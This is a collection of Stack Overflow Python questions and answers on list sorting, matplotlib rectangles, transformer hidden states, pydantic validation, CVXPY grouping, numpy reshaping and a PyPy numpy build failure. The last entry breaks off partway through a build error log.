79,549,626 | 2025-4-2 | https://stackoverflow.com/questions/79549626/why-does-sort-with-key-function-not-do-anything-while-sorted-is-working | I have a list of integers with duplicates and I need to sort it by the number of these duplicates. For example: input: n = [2, 4, 1, 2] output: n = [4, 1, 2, 2] I wrote some code and noticed, that sort() does not change the list. But if I try to use sorted() with the same key argument, then it works just fine. What is the reason behind this? My code: nums = [2, 4, 1, 2] nums.sort(key = lambda x: nums.count(x)) print(nums) Can it be connected to sort() method using in-place algorithm? | Unlike sorted, the list.sort method sorts a list in-place, during which time the list is in an interim state where there is no integrity to its internal data structure for the other methods to read from. Since a key function for the sort method is called during a sort, your calling the count method of the same list in the key function does not actually return the count of a given item as you expect, which you can see with a wrapper function: def count(x): n = nums.count(x) print(n) return n nums = [2, 4, 1, 2] nums.sort(key=count) the above outputs: 0 0 0 0 which explains why the list remains in the same order since the key for each item turns out to be the same value of 0 and since the sorting algorithm used is a stable one. The documentation of list.sort also notes: CPython implementation detail: While a list is being sorted, the effect of attempting to mutate, or even inspect, the list is undefined. The C implementation of Python makes the list appear empty for the duration, and raises ValueError if it can detect that the list has been mutated during a sort. So CPython's implementation makes the list appear empty during a sort, which explains why list.count returns 0 when called from a key function. | 4 | 5 |
79,547,850 | 2025-4-1 | https://stackoverflow.com/questions/79547850/why-is-the-bounding-box-not-aligned-to-the-square | import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Rectangle def generate_square_image(size, square_size, noise_level=0.0): """ Generates an image with a white square in the center. Args: size (int): The size of the image (size x size). square_size (int): The size of the square. noise_level (float): Standard deviation of Gaussian noise. Returns: numpy.ndarray: The image as a numpy array. numpy.ndarray: The mask. tuple: Bounding box (x_min, y_min, width, height). """ # create mask mask = np.zeros((size, size)) start = (size - square_size) // 2 end = start + square_size mask[start:end, start:end] = 1 # create bounding box bbox = (start, start, square_size, square_size) # create noisy image img = mask.copy() if noise_level > 0: noise = np.random.normal(0, noise_level, img.shape) img = np.clip(img + noise, 0, 1) return img, mask, bbox # Example usage: size = 100 square_size = 40 img, mask, bbox = generate_square_image(size, square_size, noise_level=0.1) # Plot the image fig, ax = plt.subplots(1, 3, figsize=(15, 5)) ax[0].imshow(img, cmap='gray') ax[0].set_title('Generated Image') ax[1].imshow(mask, cmap='gray') ax[1].set_title('Mask') # Display the bounding box overlayed on the image ax[2].imshow(img, cmap='gray') x, y, width, height = bbox # The key fix: in matplotlib, the Rectangle coordinates start at the bottom-left corner # But imshow displays arrays with the origin at the top-left corner rect = Rectangle((x, y), width, height, linewidth=2, edgecolor='r', facecolor='none') ax[2].add_patch(rect) ax[2].set_title('Image with Bounding Box') # Ensure origin is set to 'upper' to match imshow defaults for a in ax: a.set_ylim([size, 0]) # Reverse y-axis to match array indexing plt.tight_layout() plt.show() Question: What is the right code to align the box properly? It seems to be the most straight forward approach to create one? As you can see, I have already tried prompting this to work, but even that fix (which seems to be the one thing to explore here, which is the difference in coordinate systems) does not seem to work either. | Fixes: 1. Subtract 0.5 from x and y in Rectangle().Matplotlib positions pixels at the center of grid cells, but imshow() assumes pixel edges align exactly with grid lines. Adjusting by -0.5 shifts the bounding box to align properly. 2. origin='upper' ensures consistency with NumPy's top-left origin. 3. Hiding axis ticks makes visualization clearer. The full corrected code is provided below: import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Rectangle def generate_square_image(size, square_size, noise_level=0.0): """ Generates an image with a white square in the center. Args: size (int): The size of the image (size x size). square_size (int): The size of the square. noise_level (float): Standard deviation of Gaussian noise. Returns: numpy.ndarray: The image as a numpy array. numpy.ndarray: The mask. tuple: Bounding box (x_min, y_min, width, height). """ # Create mask mask = np.zeros((size, size)) start = (size - square_size) // 2 end = start + square_size mask[start:end, start:end] = 1 # Create bounding box (x_min, y_min, width, height) bbox = (start, start, square_size, square_size) # Create noisy image img = mask.copy() if noise_level > 0: noise = np.random.normal(0, noise_level, img.shape) img = np.clip(img + noise, 0, 1) return img, mask, bbox # Example usage: size = 100 square_size = 40 img, mask, bbox = generate_square_image(size, square_size, noise_level=0.1) # Plot the image fig, ax = plt.subplots(1, 3, figsize=(15, 5)) # Display the generated image ax[0].imshow(img, cmap='gray', origin='upper') ax[0].set_title('Generated Image') # Display the mask ax[1].imshow(mask, cmap='gray', origin='upper') ax[1].set_title('Mask') # Display the image with bounding box ax[2].imshow(img, cmap='gray', origin='upper') x, y, width, height = bbox # Adjust bounding box position to match imshow's top-left origin rect = Rectangle((x - 0.5, y - 0.5), width, height, linewidth=2, edgecolor='r', facecolor='none') ax[2].add_patch(rect) ax[2].set_title('Image with Bounding Box') # Ensure correct axis orientation for a in ax: a.set_xticks([]) a.set_yticks([]) plt.tight_layout() plt.show() OutPut: | 3 | 3 |
79,549,110 | 2025-4-1 | https://stackoverflow.com/questions/79549110/huggingface-tokenizer-str-object-has-no-attribute-size | I am trying to extract the hidden states of a transformer model: from transformers import AutoModel import torch from transformers import AutoTokenizer model_ckpt = "distilbert-base-uncased" device = torch.device("cuda" if torch.cuda.is_available() else "cpu") tokenizer = AutoTokenizer.from_pretrained(model_ckpt) model = AutoModel.from_pretrained(model_ckpt).to(device) from datasets import load_dataset emotions = load_dataset("emotion", ignore_verifications=True) # tokenize data def tokenize(batch): return tokenizer(batch["text"], padding=True, truncation=True) emotions_encoded = emotions.map(tokenize, batched=True, batch_size=None) def extract_hidden_states(batch): inputs = {k:v.to(device) for k,v in batch.items() if k in tokenizer.model_input_names} with torch.no_grad(): last_hidden_state = model(*inputs).last_hidden_state return{"hidden_state": last_hidden_state[:,0].cpu().numpy()} # convert input_ids and attention_mask columns to "torch" format emotions_encoded.set_format("torch", columns=["input_ids", "attention_mask", "label"]) # extract hidden states emotions_hidden = emotions_encoded.map(extract_hidden_states, batched=True) However, on running the last line I get the error 'str' object has no attribute 'size' I've tried deprecating the transformers package but that didn't fix it. Some posts online indicate it may have to do with the transformer package will return a dictionary by default, but I don't know how to work around that. Full error: AttributeError Traceback (most recent call last) Cell In[8], line 5 2 emotions_encoded.set_format("torch", columns=["input_ids", "attention_mask", "label"]) 4 # extract hidden states ----> 5 emotions_hidden = emotions_encoded.map(extract_hidden_states, batched=True) File ~\Anaconda3\envs\ml\lib\site-packages\datasets\dataset_dict.py:851, in DatasetDict.map(self, function, with_indices, with_rank, input_columns, batched, batch_size, drop_last_batch, remove_columns, keep_in_memory, load_from_cache_file, cache_file_names, writer_batch_size, features, disable_nullable, fn_kwargs, num_proc, desc) 848 if cache_file_names is None: 849 cache_file_names = {k: None for k in self} 850 return DatasetDict( --> 851 { 852 k: dataset.map( 853 function=function, 854 with_indices=with_indices, 855 with_rank=with_rank, 856 input_columns=input_columns, 857 batched=batched, 858 batch_size=batch_size, 859 drop_last_batch=drop_last_batch, 860 remove_columns=remove_columns, 861 keep_in_memory=keep_in_memory, 862 load_from_cache_file=load_from_cache_file, 863 cache_file_name=cache_file_names[k], 864 writer_batch_size=writer_batch_size, 865 features=features, 866 disable_nullable=disable_nullable, 867 fn_kwargs=fn_kwargs, 868 num_proc=num_proc, 869 desc=desc, 870 ) 871 for k, dataset in self.items() 872 } 873 ) File ~\Anaconda3\envs\ml\lib\site-packages\datasets\dataset_dict.py:852, in <dictcomp>(.0) 848 if cache_file_names is None: 849 cache_file_names = {k: None for k in self} 850 return DatasetDict( 851 { --> 852 k: dataset.map( 853 function=function, 854 with_indices=with_indices, 855 with_rank=with_rank, 856 input_columns=input_columns, 857 batched=batched, 858 batch_size=batch_size, 859 drop_last_batch=drop_last_batch, 860 remove_columns=remove_columns, 861 keep_in_memory=keep_in_memory, 862 load_from_cache_file=load_from_cache_file, 863 cache_file_name=cache_file_names[k], 864 writer_batch_size=writer_batch_size, 865 features=features, 866 disable_nullable=disable_nullable, 867 fn_kwargs=fn_kwargs, 868 num_proc=num_proc, 869 desc=desc, 870 ) 871 for k, dataset in self.items() 872 } 873 ) File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:578, in transmit_tasks.<locals>.wrapper(*args, **kwargs) 576 self: "Dataset" = kwargs.pop("self") 577 # apply actual function --> 578 out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) 579 datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] 580 for dataset in datasets: 581 # Remove task templates if a column mapping of the template is no longer valid File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:543, in transmit_format.<locals>.wrapper(*args, **kwargs) 536 self_format = { 537 "type": self._format_type, 538 "format_kwargs": self._format_kwargs, 539 "columns": self._format_columns, 540 "output_all_columns": self._output_all_columns, 541 } 542 # apply actual function --> 543 out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) 544 datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] 545 # re-apply format to the output File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:3073, in Dataset.map(self, function, with_indices, with_rank, input_columns, batched, batch_size, drop_last_batch, remove_columns, keep_in_memory, load_from_cache_file, cache_file_name, writer_batch_size, features, disable_nullable, fn_kwargs, num_proc, suffix_template, new_fingerprint, desc) 3065 if transformed_dataset is None: 3066 with logging.tqdm( 3067 disable=not logging.is_progress_bar_enabled(), 3068 unit=" examples", (...) 3071 desc=desc or "Map", 3072 ) as pbar: -> 3073 for rank, done, content in Dataset._map_single(**dataset_kwargs): 3074 if done: 3075 shards_done += 1 File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:3449, in Dataset._map_single(shard, function, with_indices, with_rank, input_columns, batched, batch_size, drop_last_batch, remove_columns, keep_in_memory, cache_file_name, writer_batch_size, features, disable_nullable, fn_kwargs, new_fingerprint, rank, offset) 3445 indices = list( 3446 range(*(slice(i, i + batch_size).indices(shard.num_rows))) 3447 ) # Something simpler? 3448 try: -> 3449 batch = apply_function_on_filtered_inputs( 3450 batch, 3451 indices, 3452 check_same_num_examples=len(shard.list_indexes()) > 0, 3453 offset=offset, 3454 ) 3455 except NumExamplesMismatchError: 3456 raise DatasetTransformationNotAllowedError( 3457 "Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it." 3458 ) from None File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:3330, in Dataset._map_single.<locals>.apply_function_on_filtered_inputs(pa_inputs, indices, check_same_num_examples, offset) 3328 if with_rank: 3329 additional_args += (rank,) -> 3330 processed_inputs = function(*fn_args, *additional_args, **fn_kwargs) 3331 if isinstance(processed_inputs, LazyDict): 3332 processed_inputs = { 3333 k: v for k, v in processed_inputs.data.items() if k not in processed_inputs.keys_to_format 3334 } Cell In[7], line 6, in extract_hidden_states(batch) 3 inputs = {k:v.to(device) for k,v in batch.items() 4 if k in tokenizer.model_input_names} 5 with torch.no_grad(): ----> 6 last_hidden_state = model(*inputs).last_hidden_state 7 return{"hidden_state": last_hidden_state[:,0].cpu().numpy()} File ~\Anaconda3\envs\ml\lib\site-packages\torch\nn\modules\module.py:1511, in Module._wrapped_call_impl(self, *args, **kwargs) 1509 return self._compiled_call_impl(*args, **kwargs) # type: ignore[misc] 1510 else: -> 1511 return self._call_impl(*args, **kwargs) File ~\Anaconda3\envs\ml\lib\site-packages\torch\nn\modules\module.py:1520, in Module._call_impl(self, *args, **kwargs) 1515 # If we don't have any hooks, we want to skip the rest of the logic in 1516 # this function, and just call forward. 1517 if not (self._backward_hooks or self._backward_pre_hooks or self._forward_hooks or self._forward_pre_hooks 1518 or _global_backward_pre_hooks or _global_backward_hooks 1519 or _global_forward_hooks or _global_forward_pre_hooks): -> 1520 return forward_call(*args, **kwargs) 1522 try: 1523 result = None File ~\Anaconda3\envs\ml\lib\site-packages\transformers\models\distilbert\modeling_distilbert.py:593, in DistilBertModel.forward(self, input_ids, attention_mask, head_mask, inputs_embeds, output_attentions, output_hidden_states, return_dict) 591 elif input_ids is not None: 592 self.warn_if_padding_and_no_attention_mask(input_ids, attention_mask) --> 593 input_shape = input_ids.size() 594 elif inputs_embeds is not None: 595 input_shape = inputs_embeds.size()[:-1] AttributeError: 'str' object has no attribute 'size' | The issue is happening when you're filtering the dictionary, extract_hidden_states in your extract_hidden_states() function. This dictionary includes keys like 'text' (which contains strings), the function may mistakenly try to .to(device) on a string, which I'm guessing is causing the error here. You can modify your function this way: def extract_hidden_states(batch): inputs = {k: v for k, v in batch.items() if k in tokenizer.model_input_names} # Ensure all inputs are tensors before sending them to device inputs = {k: v.clone().detach().to(device) for k, v in inputs.items()} with torch.no_grad(): outputs = model(**inputs) # Unpacking inputs properly last_hidden_state = outputs.last_hidden_state return {"hidden_state": last_hidden_state[:, 0].cpu().numpy()} | 1 | 2 |
79,549,000 | 2025-4-1 | https://stackoverflow.com/questions/79549000/pydantic-object-self-validation | I am trying to understand the way validation works in pydantic. I create a class and three objects: import pydantic class TestClass(pydantic.BaseModel): id: int = 'text' name: str obj0 = TestClass(id=1, name="test") obj1 = TestClass(name="test") obj2 = TestClass.model_construct(id=2) One may see that first object is totally valid, second semivalid, and third one definitive not, that's why I omit the validation using model_construct(). Now I want to validate the objects, as pydantic suggests: vobj0= TestClass.model_validate(obj0, strict=True) vobj1= TestClass.model_validate(obj1, strict=True) vobj2= TestClass.model_validate(obj2, strict=True) The problem is that NONE of the lines rises ValidationError! I found a clumsy way around it, namely transforming objects to dicts: vobj0= TestClass.model_validate(obj0.model_dump(), strict=True) vobj1= TestClass.model_validate(obj1.model_dump(), strict=True) vobj2= TestClass.model_validate(obj2.model_dump(), strict=True) This code does raise the ValidationError in the second and third lines. I cannot understand why does it behave in such a funny way? I expected something like obj.validate_me(), but can't find anything like this. So, my question: if I create an object without validation (with model_construct()), what is the right way to do the validation afterwards? | By default Pydantic does not re-validate instances, because it assumes they have been validated. This is configurable, the docs is here In your test program, all you need is to update the TestClass definition: class TestClass(pydantic.BaseModel, revalidate_instances='always'): ... (There is also another related option you might find interesting: validate_assignment) Field defaults are also not validated by default. (See the validate_default parameter in Field). Otherwise you would not be able to write: id: int = 'text' | 1 | 2 |
79,548,243 | 2025-4-1 | https://stackoverflow.com/questions/79548243/how-to-do-a-groupby-on-a-cxvpy-variable-is-there-a-way-using-pandas | I would like to define a loss function for the CVXPy optimization that minimizes differences from the reference grouped target: import cvxpy as cp import pandas as pd # toy example for demonstration purpose target = pd.DataFrame(data={'a': ['X', 'X', 'Y', 'Z', 'Z'], 'b': [1]*5}) w = cp.Variable(target.shape[0]) beta = cp.Variable(target.shape[0]) def loss_func(w, beta): x = pd.DataFrame(data={'a': target['a'], 'b': w @ beta}).groupby('a')['b'].sum() y = target.groupby('a')['b'].sum() return cp.norm2(x - y)**2 # <<<<<<<<<<<<<< ValueError: setting an array element with a sequence. but this gives me the following error ValueError: setting an array element with a sequence. What would be the way to cover this use-case using CVXPy? | Based on my understanding, your code calculates the sum of weighted values (w @ beta) grouped by the unique values in column "a". However, since Pandas cannot handle CVXPY variables, this approach results in errors. The hstack method, on the other hand, uses native CVXPY functions like cp.sum() and cp.hstack(), making it fully compatible and error-free while giving the same result. Therefore, it’s better to use the hstack approach. for example: import cvxpy as cp import pandas as pd # toy example for demonstration purpose target = pd.DataFrame(data={"a": ["X", "X", "Y", "Z", "Z"], "b": [1] * 5}) w = cp.Variable(target.shape[0]) beta = cp.Variable(target.shape[0]) def loss_func2(w, beta): x = cp.hstack([ cp.sum(w[target["a"] == group] * beta[target["a"] == group]) for group in target["a"].unique() ]) y = target.groupby("a")["b"].sum().values return cp.norm2(x - y) ** 2 | 1 | 1 |
79,548,754 | 2025-4-1 | https://stackoverflow.com/questions/79548754/reshape-4d-array-to-2d | I have the array import numpy as np a1 = [["a1", "a2"], ["a3", "a4"], ["a5", "a6"], ["a7", "a8"]] b1 = [["b1", "b2"], ["b3", "b4"], ["b5", "b6"], ["b7","b8"]] c1 = [["c1", "c2"], ["c3", "c4"], ["c5", "c6"], ["c7","c8"]] arr = np.array([a1, b1, c1]) #arr.shape #(3, 4, 2) Which I want to reshape to a 2D array: ["a1","b1","c1"], ["a2","b2","c2"], ..., ["a8","b8","c8"] I've tried different things like: # arr.reshape((8,3)) # array([['a1', 'a2', 'a3'], # ['a4', 'a5', 'a6'], # ['a7', 'a8', 'b1'], # ['b2', 'b3', 'b4'], # ['b5', 'b6', 'b7'], # ['b8', 'c1', 'c2'], # ['c3', 'c4', 'c5'], # ['c6', 'c7', 'c8']]) #arr.T.reshape(8,3) # array([['a1', 'b1', 'c1'], # ['a3', 'b3', 'c3'], # ['a5', 'b5', 'c5'], # ['a7', 'b7', 'c7'], # ['a2', 'b2', 'c2'], # ['a4', 'b4', 'c4'], # ['a6', 'b6', 'c6'], # ['a8', 'b8', 'c8']] # arr.ravel().reshape(8,3) # array([['a1', 'a2', 'a3'], # ['a4', 'a5', 'a6'], # ['a7', 'a8', 'b1'], # ['b2', 'b3', 'b4'], # ['b5', 'b6', 'b7'], # ['b8', 'c1', 'c2'], # ['c3', 'c4', 'c5'], # ['c6', 'c7', 'c8']]) | What you want is to stack the arrays such that the final 2D shape is (8, 3), where each row contains the same index from each original array. So the key is to use np.array(arr).transpose(1, 2, 0).reshape(-1, 3). Code Example: import numpy as np a1 = [["a1", "a2"], ["a3", "a4"], ["a5", "a6"], ["a7", "a8"]] b1 = [["b1", "b2"], ["b3", "b4"], ["b5", "b6"], ["b7","b8"]] c1 = [["c1", "c2"], ["c3", "c4"], ["c5", "c6"], ["c7","c8"]] arr = np.array([a1, b1, c1]) # shape: (3, 4, 2) result = arr.transpose(1, 2, 0).reshape(-1, 3) print(result) | 2 | 2 |
79,548,492 | 2025-4-1 | https://stackoverflow.com/questions/79548492/cant-install-numpy-with-pypy-7-3-19 | I'm trying to install numpy (2.2.3) with PyPy 7.3.19 (Python 3.11.11). I'm using PyPy in a .venv folder. While the venv is active, I've tried running these commands: python -m pip install numpy pip install numpy pypy -m pip install numpy First windows flagged the install as a virus: This was fixed by allowing the threat. After this was fixed I got this error (error has been truncated to fit stack overflow): [402/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_legacy_array_method.c.obj [403/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_extobj.c.obj [404/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_heapsort.cpp.obj [405/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_reduction.c.obj [406/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_override.c.obj [407/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_dispatching.cpp.obj [408/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_ufunc_type_resolution.c.obj [409/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_clip.cpp.obj [410/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_wrapping_array_method.c.obj [411/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath__scaled_float_dtype.c.obj [412/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_special_integer_comparisons.cpp.obj [413/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_SSE42.a.p\\_simd_inc.h' [414/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_SSE42.a.p\\_simd_data.inc' [415/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX2.a.p\\_simd_data.inc' [416/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_SSE42.a.p\\_simd.dispatch.c' [417/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX2.a.p\\_simd_inc.h' [418/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/meson-generated_lowlevel_strided_loops.c.obj [419/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_FMA3.a.p\\_simd_inc.h' [420/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX2.a.p\\_simd.dispatch.c' [421/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_FMA3.a.p\\_simd_data.inc' [422/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_FMA3.a.p\\_simd.dispatch.c' [423/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512F.a.p\\_simd_inc.h' [424/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_ufunc_object.c.obj [425/530] Compiling C++ object numpy/_core/libx86_simd_argsort.dispatch.h_AVX2.a.p/src_npysort_x86_simd_argsort.dispatch.cpp.obj [426/530] Linking static target numpy/_core/libx86_simd_argsort.dispatch.h_AVX2.a [427/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_quicksort.cpp.obj [428/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_selection.cpp.obj [429/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512F.a.p\\_simd_data.inc' [430/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512_SKX.a.p\\_simd_inc.h' [431/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_stringdtype_ufuncs.cpp.obj [432/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512_SKX.a.p\\_simd_data.inc' [433/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512F.a.p\\_simd.dispatch.c' [434/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512_SKX.a.p\\_simd.dispatch.c' [435/530] Compiling C object numpy/_core/_simd.pypy311-pp73-win_amd64.pyd.p/src__simd__simd.c.obj [436/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_litemodule.c.obj [437/530] Compiling C object numpy/_core/_simd.pypy311-pp73-win_amd64.pyd.p/src_common_npy_cpu_features.c.obj [438/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_python_xerbla.c.obj [439/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c.c.obj [440/530] Compiling C object numpy/_core/libloops_autovec.dispatch.h_AVX2.a.p/meson-generated_loops_autovec.dispatch.c.obj [441/530] Linking static target numpy/_core/libloops_autovec.dispatch.h_AVX2.a [442/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_string_ufuncs.cpp.obj [443/530] Linking static target numpy/_core/lib_multiarray_umath_mtargets.a [444/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_umathmodule.c.obj [445/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_timsort.cpp.obj [446/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_config.c.obj [447/530] Linking target numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd [448/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_lapack.c.obj [449/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_python_xerbla.c.obj [450/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c.c.obj [451/530] Compiling C object numpy/_core/lib_simd.dispatch.h_SSE42.a.p/meson-generated__simd.dispatch.c.obj [452/530] Linking static target numpy/_core/lib_simd.dispatch.h_SSE42.a [453/530] Compiling C object numpy/_core/lib_simd.dispatch.h_baseline.a.p/meson-generated__simd.dispatch.c.obj [454/530] Linking static target numpy/_core/lib_simd.dispatch.h_baseline.a [455/530] Compiling C object numpy/_core/lib_simd.dispatch.h_AVX512_SKX.a.p/meson-generated__simd.dispatch.c.obj [456/530] Linking static target numpy/_core/lib_simd.dispatch.h_AVX512_SKX.a [457/530] Compiling C object numpy/_core/lib_simd.dispatch.h_AVX2.a.p/meson-generated__simd.dispatch.c.obj [458/530] Linking static target numpy/_core/lib_simd.dispatch.h_AVX2.a [459/530] Compiling C object numpy/_core/lib_simd.dispatch.h_FMA3.a.p/meson-generated__simd.dispatch.c.obj [460/530] Linking static target numpy/_core/lib_simd.dispatch.h_FMA3.a [461/530] Compiling C object numpy/_core/lib_simd.dispatch.h_AVX512F.a.p/meson-generated__simd.dispatch.c.obj [462/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_config.c.obj [463/530] Linking static target numpy/_core/lib_simd.dispatch.h_AVX512F.a [464/530] Linking static target numpy/_core/lib_simd_mtargets.a [465/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_z_lapack.c.obj [466/530] Linking target numpy/_core/_simd.pypy311-pp73-win_amd64.pyd [467/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_logfactorial.c.obj [468/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_lapack.c.obj [469/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_random_mvhg_count.c.obj [470/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_c_lapack.c.obj [471/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_random_mvhg_marginals.c.obj [472/530] Compiling C++ object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/umath_linalg.cpp.obj [473/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_random_hypergeometric.c.obj [474/530] Copying file numpy/random/__init__.py [475/530] Compiling C object numpy/random/libnpyrandom.a.p/src_distributions_distributions.c.obj [476/530] Copying file numpy/random/_common.pxd [477/530] Copying file numpy/random/__init__.pxd [478/530] Linking static target numpy/random/libnpyrandom.a [479/530] Copying file numpy/random/bit_generator.pxd [480/530] Generating numpy/random/_bounded_integer_pxd with a custom command [481/530] Generating numpy/random/_bounded_integer_pyx with a custom command [482/530] Copying file numpy/random/c_distributions.pxd [483/530] Copying file numpy/random/_generator.pyx [484/530] Copying file numpy/random/mtrand.pyx [485/530] Compiling C object numpy/random/_mt19937.pypy311-pp73-win_amd64.pyd.p/src_mt19937_mt19937.c.obj [486/530] Compiling C object numpy/random/_mt19937.pypy311-pp73-win_amd64.pyd.p/src_mt19937_mt19937-jump.c.obj [487/530] Compiling C object numpy/random/_philox.pypy311-pp73-win_amd64.pyd.p/src_philox_philox.c.obj [488/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_c_lapack.c.obj [489/530] Compiling C object numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/src_pcg64_pcg64.c.obj [490/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_blas.c.obj [491/530] Compiling C object numpy/random/_sfc64.pypy311-pp73-win_amd64.pyd.p/src_sfc64_sfc64.c.obj [492/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_d_lapack.c.obj [493/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_pcg64.pyx [494/530] Compiling C object numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj FAILED: numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj "cc" "-Inumpy\random\_pcg64.pypy311-pp73-win_amd64.pyd.p" "-Inumpy\random" "-I..\numpy\random" "-I..\numpy\random\src" "-Inumpy\_core" "-I..\numpy\_core" "-Inumpy\_core\include" "-I..\numpy\_core\include" "-I..\numpy\_core\src\common" "-Inumpy" "-IC:\pypy3\Include" "-IC:\Users\semva\AppData\Local\Temp\pip-install-0q1qbetl\numpy_627fd22ca8764d2db937a682f82fea68\.mesonpy-2vaxsk5m\meson_cpu" "-fvisibility=hidden" "-fdiagnostics-color=always" "-DNDEBUG" "-Wall" "-Winvalid-pch" "-std=c11" "-O3" "-fno-strict-aliasing" "-msse" "-msse2" "-msse3" "-DNPY_HAVE_SSE2" "-DNPY_HAVE_SSE" "-DNPY_HAVE_SSE3" "-mlong-double-64" "-D__USE_MINGW_ANSI_STDIO=1" "-DMS_WIN64=" "-D_FILE_OFFSET_BITS=64" "-D_LARGEFILE_SOURCE=1" "-D_LARGEFILE64_SOURCE=1" "-DNPY_NO_DEPRECATED_API=0" "-U__GNUC_GNU_INLINE__" -MD -MQ numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj -MF "numpy\random\_pcg64.pypy311-pp73-win_amd64.pyd.p\meson-generated_numpy_random__pcg64.pyx.c.obj.d" -o numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/meson-generated_numpy_random__pcg64.pyx.c.obj "-c" numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/numpy/random/_pcg64.pyx.c numpy/random/_pcg64.pypy311-pp73-win_amd64.pyd.p/numpy/random/_pcg64.pyx.c:14014:12: fatal error: internal/pycore_frame.h: No such file or 